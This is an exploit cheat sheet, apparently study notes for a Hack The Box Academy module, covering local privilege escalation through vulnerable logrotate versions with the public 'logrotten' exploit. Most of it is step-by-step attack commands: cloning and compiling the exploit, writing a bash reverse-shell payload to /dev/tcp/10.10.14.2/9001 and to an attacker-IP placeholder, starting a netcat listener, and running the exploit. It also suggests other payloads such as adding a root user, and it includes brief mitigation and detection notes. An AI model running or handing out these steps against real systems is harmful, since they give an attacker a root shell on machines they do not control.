logrotate

Every linux system produces large amounts of log files. To prevent the hard disk form overflowing, a tool called logrotate take care of archiving or disposing of old logs.

Version check

cat /etc/logrotate.conf

Cron job logrotate config file

cat /etc/logrotate.conf

Exploit requirements - Exploit

• Write permission of log files

• Logrotate must run as a privileged user or root

• Vulnerable versions: 3.8.6, 3.11.0, 3.15.0, 3.18.0

Compile payload:

gcc logrotten.c -o logrotten

HTB module: https://academy.hackthebox.com/module/51/section/1589

Understand working:

https://ivanitlearning.wordpress.com/2021/04/17/hackthebox-book/

1. Create a payload

echo 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1' > payload

1. Which options logrotate uses in logrotate.conf

grep "create\|compress" /etc/logrotate.conf | grep -v "#"

1. Start listener

nc -nlvp 9001

1. Run exploit

./logrotten -p ./payload /tmp/tmp.log (path to constant log change)

If compress is set

./logrotten -p ../../payload -c -s 4 /tmp/tmp.log

---

---

---

Check logrotate version (if possible)

logrotate --version

View logrotate configuration

cat /etc/logrotate.conf
ls /etc/logrotate.d/

Find logrotate options (create or compress)

grep "create\|compress" /etc/logrotate.conf | grep -v "#"

Clone logrotten exploit

git clone https://github.com/whotwagner/logrotten.git
cd logrotten

Compile logrotten

gcc logrotten.c -o logrotten

Create reverse shell payload

echo 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1' > payload

Start netcat listener (attacker machine)

nc -nlvp <attacker_port>

Run logrotten exploit

./logrotten -p ./payload /tmp/tmp.log

Force logrotate to run (if needed, and if you have sudo)

sudo logrotate -f /etc/logrotate.conf # or a specific file in /etc/logrotate.d/

Check logrotate status file (if you have sudo)

sudo cat /var/lib/logrotate.status

Key Concepts:

• Log Rotation:

  • logrotate is a utility for managing log files.

  • It rotates, compresses, or removes old log files to prevent disk space exhaustion.

• Configuration:

  • /etc/logrotate.conf: Global configuration file.

  • /etc/logrotate.d/: Directory for service-specific configurations.

• Vulnerability:

  • Certain versions of logrotate (3.8.6, 3.11.0, 3.15.0, 3.18.0) are vulnerable.

  • Exploitable when logrotate runs as root and the attacker has write access to the log files.

• Exploitation:

  • logrotten exploit.

  • Payload injection.

Exploitation Steps (as described):

1. Check logrotate Configuration:

   • man logrotate or logrotate --help to check version and options.

   • cat /etc/logrotate.conf and ls /etc/logrotate.d/ to view the configurations.

   • grep "create\|compress" /etc/logrotate.conf | grep -v "#" to identify the options used.

2. Download and Compile logrotten:

   • git clone https://github.com/whotwagner/logrotten.git

   • cd logrotten

   • gcc logrotten.c -o logrotten

3. Create Payload:

   • echo 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1' > payload

4. Start Netcat Listener:

   • nc -nlvp <attacker_port>

5. Run logrotten:

   • ./logrotten -p ./payload /tmp/tmp.log

Important Considerations and Enhancements:

• Vulnerability Details:

  • The vulnerability stems from how logrotate handles file creation and permissions during rotation.

• Exploit Reliability:

  • The exploit's success depends on the specific logrotate configuration and system environment.

• Alternative Payloads:

  • Other payloads can be used, such as adding a root user or modifying /etc/sudoers.

• Mitigation:

  • Update logrotate to a patched version.

  • Restrict write access to log files.

  • use tools like SELinux or AppArmor to restrict logrotate.

• Detection:

  • Monitor log file changes.

  • Use intrusion detection systems.

  • Monitor for unexpected root shells.

• Real World Examples: Researching real world logrotate exploits will help solidify understanding of the attack vectors.

• Logrotate status file: The logrotate status file can be manipulated, but this is less common than the exploit described.